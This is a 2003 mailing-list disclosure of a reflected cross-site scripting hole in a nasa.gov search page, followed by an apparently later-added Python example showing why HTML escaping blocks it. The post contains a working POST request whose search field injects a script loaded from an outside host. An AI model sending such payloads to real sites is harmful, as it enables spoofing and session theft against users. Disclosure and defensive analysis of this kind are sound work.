[Full-Disclosure] More Cross Site Scripting in NASA.gov Sites
- To: "Full-Disclosure" <full-disclosure@lists.netsys.com>
- Subject: [Full-Disclosure] More Cross Site Scripting in NASA.gov Sites
- From: "Lorenzo Hernandez Garcia-Hierro" <lorenzohgh@nsrg-security.com>
- Date: Wed, 15 Oct 2003 01:33:44 +0200
Hi friends,
Another security hole in a nasa.gov website, another XSS:
Use this POST request for proof of concept:
_________________________________
POST /search/query.asp HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/msword, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, */*
Referer: http://www.whereeveryouare.foo
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Host: si.ksc.nasa.gov
Content-Length: 129
Pragma: no-cache
Cookie: ASPSESSIONID[FIRSTSESSIONSTRING]=[MYSESSION]
Connection: keep-alive
Browser reload detected...
Posting 129 bytes...
SearchString=%22%3E%3Cscript+src%3D%22http%3A%2F%2Ftest-zone.nsrg-security.com%2Fxss%2Fspoofing.js%22%3E%3C%2Fscript%3E
Action=Go
_________________________________
Best regards and remember that security is a mind status!
Greetings to all the community: morning-wood for his arin.net greeting to me, cyrus-tc, etc.
-------------------------------
0x00->Lorenzo Hernandez Garcia-Hierro
0x01->/* not csh but sh */
0x02->$ PATH=pretending!/usr/ucb/which sense
0x03-> no sense in pretending!
__________________________________
PGP: Keyfingerprint
4ACC D892 05F9 74F1 F453 7D62 6B4E B53E 9180 5F5B
ID: 0x91805F5B
**********************************
No Secure Root Group Security Research Team
http://www.nsrg-security.com
______________________
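Added example, not part of the original post: it decodes the form body shown above and renders the search term into an HTML attribute with and without output encoding, then lets an HTML parser report which tags result. The results-page template is hypothetical (the post does not show what query.asp returns), and the "&" joining the two form fields is an assumption that makes the body match the captured Content-Length of 129.

```python
import html
from html.parser import HTMLParser
from urllib.parse import parse_qs

# Body from the post above, re-joined across the mail line wraps. The "&" between
# the two fields is an assumption; it is what makes the length match the
# Content-Length: 129 header in the captured request.
BODY = ("SearchString=%22%3E%3Cscript+src%3D%22http%3A%2F%2Ftest-zone.nsrg-security.com"
        "%2Fxss%2Fspoofing.js%22%3E%3C%2Fscript%3E&Action=Go")

# Hypothetical results-page template: the post does not show the HTML that
# query.asp returns, only that the search term is reflected.
TEMPLATE = '<input type="text" name="SearchString" value="{}">'

def search_term(body):
    """Decode the form body the way the server would and return the search term."""
    return parse_qs(body)["SearchString"][0]

def render_unescaped(term):
    """Vulnerable pattern: the decoded term is placed in the attribute as-is."""
    return TEMPLATE.format(term)

def render_escaped(term):
    """Fixed pattern: encode for an HTML attribute, quotes included."""
    return TEMPLATE.format(html.escape(term, quote=True))

class _Tags(HTMLParser):
    def __init__(self):
        super().__init__()
        self.seen = []

    def handle_starttag(self, tag, attrs):
        self.seen.append((tag, dict(attrs)))

def parsed_tags(markup):
    """Return the (tag, attributes) pairs an HTML parser finds in the output."""
    parser = _Tags()
    parser.feed(markup)
    parser.close()
    return parser.seen

if __name__ == "__main__":
    term = search_term(BODY)
    print(len(BODY), repr(term))
    print([t for t, _ in parsed_tags(render_unescaped(term))])
    print([t for t, _ in parsed_tags(render_escaped(term))])
```

In classic ASP, which the .asp endpoint suggests, the corresponding fix is to pass the value through Server.HTMLEncode before writing it into the page.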